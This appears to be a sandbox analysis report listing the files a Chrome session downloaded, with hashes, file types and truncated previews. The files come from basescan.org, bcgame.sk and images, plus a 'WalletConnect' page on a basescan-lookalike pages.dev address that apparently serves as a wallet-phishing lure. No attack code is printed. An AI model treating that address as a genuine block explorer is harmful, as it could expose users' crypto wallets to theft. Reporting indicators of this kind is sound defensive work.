                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (31994), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):68208
                                                                                                                                                                                                                                              Entropy (8bit):5.353546857238987
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:NVzNGevmRzMMdZfupgfjJ3ijEO261NyYMk5Sl5BSENUfmqxGcTJ7PBTf:PNGevmRzMMdZfupgbJ3iPNyYMZlvZqxH
                                                                                                                                                                                                                                              MD5:A3A4507A81AC03776701CF28A75B3B66
                                                                                                                                                                                                                                              SHA1:70AA8E704D7C80A216C18262CD228D609272A25E
                                                                                                                                                                                                                                              SHA-256:8C53C7C7C83C02D6E7315DBAE64C7890A845324E2B8D443B0BCFEE0DD8F1F8E8
                                                                                                                                                                                                                                              SHA-512:79A6228D82F29BDECD04A64EFC9A28F0E34385CABF8C7B2E947F6845200FF075AF4FFEE51B4470D47452A7F8B1BC4853C8586C502B4ADA6875CEE63DDF11E314
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/fancybox/jquery.fancybox.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:// ==================================================..// fancyBox v3.5.6..//..// Licensed GPLv3 for open source use..// or fancyBox Commercial License for commercial use..//..// http://fancyapps.com/fancybox/..// Copyright 2018 fancyApps..//..// ==================================================..!function(t,e,n,o){"use strict";function i(t,e){var o,i,a,s=[],r=0;t&&t.isDefaultPrevented()||(t.preventDefault(),e=e||{},t&&t.data&&(e=h(t.data.options,e)),o=e.$target||n(t.currentTarget).trigger("blur"),(a=n.fancybox.getInstance())&&a.$trigger&&a.$trigger.is(o)||(e.selector?s=n(e.selector):(i=o.attr("data-fancybox")||"",i?(s=t.data?t.data.items:[],s=s.length?s.filter('[data-fancybox="'+i+'"]'):n('[data-fancybox="'+i+'"]')):s=[o]),r=n(s).index(o),r<0&&(r=0),a=n.fancybox.open(s,e,r),a.$trigger=o))}if(t.console=t.console||{info:function(t){}},n){if(n.fn.fancybox)return void console.info("fancyBox already initialized");var a={closeExisting:!1,loop:!1,gutter:50,keyboard:!0,preventCaptionOverlap:
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1487
                                                                                                                                                                                                                                              Entropy (8bit):6.262551157225904
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Lfkkzum8COZNDsLlpGPUc6QlJRlmsAFsbSIDkygpLdvDw+Y:+ZYjwfkklfll0xlJRAsAabVDPcvA
                                                                                                                                                                                                                                              MD5:F133ACF81CA3D70E5C9284D7D8954887
                                                                                                                                                                                                                                              SHA1:AA1FFE0F8430C27C524C8A62E581F64ED7364EF9
                                                                                                                                                                                                                                              SHA-256:E053FB65DA024B0D32BBCDB35B404E5784E222814C325F84C5CDCDF923B127F4
                                                                                                                                                                                                                                              SHA-512:6714CE8217745824D0D9EEE899ADD18DE7F251CA2099D9136FA739A408F1E83F7945E13B0FEB6E8C6C51B16785DF298F6E1C58F5A137DFF6DFD305A0CB87C539
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/b0543d5f29.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..+S...|.4\.......^...6-x=...+|5.X.A~'..........a..g...,.L~....F".u.+..Z...s*.aZ.?...&)9v.....F...:).(..3eE.v....u.....&.W.q.Q^....+....&.....WU
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1121)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1122
                                                                                                                                                                                                                                              Entropy (8bit):4.838259888275404
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:w0WRXW/AbI/zWWs+TWQSlVikeRGDP1jeu7XYwYUG8iRHXNYBpCkrM:wvRzs/6WdHSlUke8ZjJY1P8idXNYBpvg
                                                                                                                                                                                                                                              MD5:A255E18E124CAD6CD50F6E9F734537C7
                                                                                                                                                                                                                                              SHA1:B446CBA4FA1345A4DADC556C97339007B3A894E1
                                                                                                                                                                                                                                              SHA-256:3A5CF52FBB21118CE11BE33C6FCBEFFABDB8594C8BBD5E954D8E79D23AF8648B
                                                                                                                                                                                                                                              SHA-512:5FC2E05ACFA068C21F0D6935D4ECE6ECADCED7A89B8F5CF61FF4AB32F74FAD7CA12DA7A43700518B60D13707B564BAFD30E0962AA19C8AF1160B9DACBD81E20C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/web-13cf6287.js
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{Aliases:s,Assets:t,ChildProperties:r,DOMElements:a,DelegatedEvents:n,Dynamic:i,ErrorBoundary:o,For:d,Hydration:l,HydrationScript:c,Index:g,Match:y,NoHydration:p,Portal:S,Properties:m,RequestContext:u,SVGElements:E,SVGNamespace:h,Show:v,Suspense:A,SuspenseList:H,Switch:N,addEventListener:P,assign:b,classList:x,className:D,clearDelegatedEvents:L,createComponent:M,delegateEvents:T,dynamicProperty:f,effect:C,escape:k,generateHydrationScript:w,getAssets:R,getHydrationKey:q,getNextElement:G,getNextMarker:K,getNextMatch:O,getOwner:V,getPropAlias:_,getRequestEvent:j,hydrate:B,innerHTML:F,insert:I,isDev:z,isServer:J,memo:Q,mergeProps:U,render:W,renderToStream:X,renderToString:Y,renderToStringAsync:Z,resolveSSRNode:$,runHydrationEvents:ee,setAttribute:se,setAttributeNS:te,setProperty:re,spread:ae,ssr:ne,ssrAttribute:ie,ssrClassList:oe,ssrElement:de,ssrHydrationKey:le,ssrSpread:ce,ssrStyle:ge,style:ye,template:pe,untrack:Se,use:me,useAssets:ue}=e.h0lnfr;export{i as D,S as
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 156 x 156, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5888
                                                                                                                                                                                                                                              Entropy (8bit):7.950936090425031
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Z5Nci99f+6BbUOXqLjJmvoMag2EhXaGdzlCPQsI1osyo7bJKIXBfExm3gGhi:Z5Nci9FTBbhUjJmvjazzUzlnsNsxBnri
                                                                                                                                                                                                                                              MD5:C1EEC85B3B59830727F450C5BEF1845D
                                                                                                                                                                                                                                              SHA1:F3D27D795C775F8BDDD21401F8B65FA8E2CE3648
                                                                                                                                                                                                                                              SHA-256:9D8FA6716D7B578ABFBB7A7F60566E9B4CE803AB91114B7488F6060B2E37AC22
                                                                                                                                                                                                                                              SHA-512:7C441D4A8ACF3E8284AA7A433FD256DB7BAAE4DAB512B9142D60CFD8DD9C602E120E1361FF3D1F24D3790594F85F1A5C2C6D623D68CFE5407FE3D14DD7BF290E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............f2....KPLTE................................................................D^......tRNS.. 0@@P_```p.................LIDATx..\..*.-...%.Af../...Mv/.d.<.N.C.."........t.z.......T........aSgL.#...?.... x.?e.....#~L.`..i..0.t!=.<.o........BY.Y.........v.&....!..j.q...-...O.9-2.M.!.F....T.y.V_"LX..mjAc&v....>..w.-...I.....`.....J........3..e.uZ|.......J.T.K.......u0b!.p.l.u...z.E..gS..=.?.v.#........Y.L..h..7..({..=.G..U.&.C...#Z..ND.,<R..p....Nx...]...3Xc..Y.GJ'....0..@..L.....s..q.G....mV......H.........5.....<..j/..+$\J...FnK)Q*GB........].."..a.M......o.9w..).N {x.$.....Cx..O0.g..O....1A..L...@.{.^..f........eg.w.I.1+..s....N.#;p.~....s.B6.....Z.....X....AFLiQV.....&..Z.Sn.....W.{.-BGe..9.u..d2..Y......1..pd.*...GJ.He...O-9...P..,.R..'.C.....}...[.....z.....d.2.0e]..Ep%*.d..: ..gwo.....M...JbR..a$*.pi\.i.u.B. .....v.......a.a/5...5.P..:..p....~..j.~.n.tc..J.._a..Y.x.z.....`kK.....3.)i2.....h..%).......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                              Entropy (8bit):4.610829954379382
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JSW/FDuX/+HwDRI3zuVVMO+DYQfDn:lRY/+HwNI3zMhe7
                                                                                                                                                                                                                                              MD5:B61BC9A832800C8F3423DF3BE5806775
                                                                                                                                                                                                                                              SHA1:5737B4E4C3D66AE1D08B2CCFC3B39912BF3FE76A
                                                                                                                                                                                                                                              SHA-256:7E9B3453C1B1FF6880BA135DDBC7F2DE2D3A374D2E90BC8977B0651E9D3A4D60
                                                                                                                                                                                                                                              SHA-512:81EDD2120A81093525CDC5F150A5E16314CE6F77FF9EB4F81C5220CFAB41AA981BAD824B52CB3548F7F8786659A774B4C40E6DE5317DCF99A22A0826CAEF0109
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/remoteEntry.js
                                                                                                                                                                                                                                              Preview:import{Z as f}from"./assets/manifest-e71017e8.js";export{f as default};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2891)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2892
                                                                                                                                                                                                                                              Entropy (8bit):5.097546923267263
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:AWXBW3XoiW4oyWnoSWdoLWqoMWXo7EW7oIfW1o/WQoMWuNouW6o6WloaW/o2OWFi:AWOXtaYCkkjY25jwqLRuXC8gm/sQesH9
                                                                                                                                                                                                                                              MD5:9C7923D1E6280948B7B38873D30965DF
                                                                                                                                                                                                                                              SHA1:794EC5097A68563CDD5DAFF6211626A5A1C18F4A
                                                                                                                                                                                                                                              SHA-256:D6BCBC36BC2C7CC44D50568C240411BCA3A8373851AA1F4A45211160B7F0797C
                                                                                                                                                                                                                                              SHA-512:A59D932BFDAE208ACF77F914BBB3E36E8AE7343B05532A8232B44B3927DC9F0CC4D65BDEE0A254811E90CF6B8B3F5A65BD90AE6B6967EC9393455FB12D770E95
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{J as t,_}from"./manifest-aca455c4.js";const{t:i,Trans:n}=t(Object.assign({"../../locales/ar-SA/index.json":()=>_(()=>import("./index-86ba13de.js"),[]).then(e=>e.default),"../../locales/bn-BD/index.json":()=>_(()=>import("./index-d533ed67.js"),[]).then(e=>e.default),"../../locales/de-DE/index.json":()=>_(()=>import("./index-5466eb7c.js"),[]).then(e=>e.default),"../../locales/en-IN/index.json":()=>_(()=>import("./index-56d569f3.js"),[]).then(e=>e.default),"../../locales/en-US/index.json":()=>_(()=>import("./index-a08e073c.js"),[]).then(e=>e.default),"../../locales/es-ES/index.json":()=>_(()=>import("./index-32e9c3fe.js"),[]).then(e=>e.default),"../../locales/fa-IR/index.json":()=>_(()=>import("./index-d02e5bf0.js"),[]).then(e=>e.default),"../../locales/fi-FI/index.json":()=>_(()=>import("./index-c3f3a06d.js"),[]).then(e=>e.default),"../../locales/fil-PH/index.json":()=>_(()=>import("./index-47fd745b.js"),[]).then(e=>e.default),"../../locales/fr-FR/index.json":()=>_(()=>import("./i
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8790
                                                                                                                                                                                                                                              Entropy (8bit):7.969090683478355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:5ImBys8RsqyJRjlhU44Awi5VKmRFBnyLeAxO0GcevW/ZTZDBCoZ:50sbqyJRjLL4AR3FByLeAc0G2ZC2
                                                                                                                                                                                                                                              MD5:ECF2B67D28DABB442C347DF7812A3E6D
                                                                                                                                                                                                                                              SHA1:6CCAB06F7C520C86D9A42D7308CD2905CEF8EBC4
                                                                                                                                                                                                                                              SHA-256:EE563B9EA71C43BA63C2713AE5E4FA55B1DDF01DFA389DED443EA16B2911949D
                                                                                                                                                                                                                                              SHA-512:D414A6F2EBE1DA404C6330E30CC081811B946A1C34075582AD7590AB7953510D019C2EDF4E0A3AD459C2210F78C46EA101AB13B2D7CBD253DAC56E75228903B2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^.]a....#T.j~.Bf..x...l9p...{34M...."+N........g.....V.]..s.gl.y..].k....-l.....)p...:.......+...}_.=........}.G........3....[.6k.r..I..Y<..'....j).3aK...[~..G..9whV,..h.q...J*......wg.A.u..FdT......U...3s^.....>F..B........T.(M.(....D.&...(o....].....1...l."73\.y..-Q...%4..3|f.S..f....WhFE.~g..m..dR\+i.r5..)..I....._.....6m.2.}.;Q<G.x..-e..L..\..h\..Nn.5..:.@.p.:..._fI..<.......4.Z.m...N".}....Z.)...*.Qe.....u.....u...>.<..,.g].........P.S....^. ..2r...H%Z+..r.:...V.Z....LpS.u. ....(}.-c......D.fD......FX>..q.a......J$v^!fW7.!...... J{.@<.@...7..4S......^.;.\.%#.....,....)..KR.Z+..`..Sg.EK.......%..5M....Kk.J7..=Xk.u.....d.).a[..2.`..y.C.._.Z.<g......UQ..%)y._p.`}..a.*X.N4/.....h..tG3..2.....YP..+.B..Y.....}.h.p..H.T...X2+a.V.E..Sa.l.X......ke.`{...+9%c4K.-R.b.v-.). ..{...R.D....ox...,...?.k}.E.F.7.a+.U....u...0......1Jw6v)V....V..7..4d..mm...~k..R5..).....9..vpO.5%Y!XQ....dV..."`...I.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (4329)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4330
                                                                                                                                                                                                                                              Entropy (8bit):5.335670450291742
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:7ylqMhha0L2B+BBOo14Ly8HmDKMu9JshmL8mzIPzigLDNAX:7EL2BAOo14Ly3K59SYNzI7iT
                                                                                                                                                                                                                                              MD5:746ED86882249153D38115740C56CDDB
                                                                                                                                                                                                                                              SHA1:A5921E309DCA46DEA76A134B98C7B3CB95917F55
                                                                                                                                                                                                                                              SHA-256:0179E7669871FF1F7043527849F62A34F1D3216C57112A5D77CD3B221148BA76
                                                                                                                                                                                                                                              SHA-512:7FEE49DD538D144221B59FAC0FD5E6EA5DE918F50C582B9854ADF13729554B78CE501E12B8329FA641796803398487725E5C93753534FB9D1EFFBC3BB95F9AEE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://eas.etherscan.com/d3d3/ZGVsaXZlcnk/YXN5bmNqcw==.php
                                                                                                                                                                                                                                              Preview:(function(d,c){var a="033e0828aecd8a15c31181716c4b1552";c.reviveAsync=c.reviveAsync||{};(function(e){if(typeof e.CustomEvent==="function"){return false}function g(i,j){j=j||{bubbles:false,cancelable:false,detail:undefined};var h=document.createEvent("CustomEvent");h.initCustomEvent(i,j.bubbles,j.cancelable,j.detail);return h}g.prototype=e.Event.prototype;e.CustomEvent=g})(c);try{if(!c.reviveAsync.hasOwnProperty(a)){var f=c.reviveAsync[a]={id:Object.keys(c.reviveAsync).length,name:"t8xt5pt6kr",ywpz:0,main:function(){var e=function(){var g=false;try{if(!g){g=true;d.removeEventListener("DOMContentLoaded",e,false);c.removeEventListener("load",e,false);f.addEventListener("start",f.start);f.addEventListener("refresh",f.refresh);f.dispatchEvent("start",{start:true})}}catch(h){console.log(h)}};f.dispatchEvent("init");if(d.readyState==="complete"){setTimeout(e)}else{d.addEventListener("DOMContentLoaded",e,false);c.addEventListener("load",e,false)}},start:function(g){if(g.detail&&g.detail.hasOwn
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1045)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):30691
                                                                                                                                                                                                                                              Entropy (8bit):4.952933530189772
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:g5dBEQ8NQigwqJUm4wHoh0PmmAF0dFnWNg7agK4:g5cz0G0P5nWe77D
                                                                                                                                                                                                                                              MD5:9514966AB149989A0D5ABB51234FBE52
                                                                                                                                                                                                                                              SHA1:1C707D4EE0F255ADBAFC1B2AFBAEA6D86ACC1048
                                                                                                                                                                                                                                              SHA-256:A8A741C8078B583B6221856D7CC42D328C975C3744179B9BFE309DAFD3B343EE
                                                                                                                                                                                                                                              SHA-512:223535B63CD7E80E0B28C9AF5B7E7957B0C29271E2820C62D77993B3C1D24DD39F7E6BBE3EFF76BC29163F90B2FF1D01A769C9CE203EAF55F89E35333E6CD695
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.header.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSHeader={_baseConfig:{headerFixMoment:0,headerFixEffect:'slide',breakpointsMap:{'md':768,'sm':576,'lg':992,'xl':1200}},init:function(element){if(!element||element.length!==1||element.data('HSHeader'))return;var self=this;this.element=element;this.config=$.extend(true,{},this._baseConfig,element.data());this.observers=this._detectObservers();this.fixMediaDifference(this.element);this.element.data('HSHeader',new HSHeader(this.element,this.config,this.observers));$(window).on('scroll.uHeader',function(e){if($(window).scrollTop()<($(element).data('header-fix-moment')-100)&&$(element).data('effect-compensation')===true){$(element).css({top:-($(window).scrollTop())}).addClass($(element).data('effect-compensation-start-class')).removeClass($(element).data('effect-compensation-end-class'));}else if($(element).data('effect-compensation')===true){$(element).css({top:0}).addClass($(element).data('effect-compensation-end-class')).removeClass($(elemen
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (944)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):18893
                                                                                                                                                                                                                                              Entropy (8bit):4.409118938125896
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:E8Kv5tc6QBWIdQFpEthnZ2dNON7o84H7rezwKr9MGQgwHH:Ebv0dt4QN7vc7kr4n
                                                                                                                                                                                                                                              MD5:085A8AF47E18981ED57C7BA912A948AD
                                                                                                                                                                                                                                              SHA1:EEFBD2FBF3ECFEC7EB4C8E301AED49858DBF7879
                                                                                                                                                                                                                                              SHA-256:4938354C9F9849B0A7CE6D5D4B9124C27C15B5563EC4ED697C768974DC61F83C
                                                                                                                                                                                                                                              SHA-512:C74E1B41032B2045A2068C2D8759BA01B47BD04B94C2E0C52877C921CE1AA9CA2F1B739024172F72053E7A1D1DA183E794D35A12B2E6CBC63E9D967DBE8C8E81
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
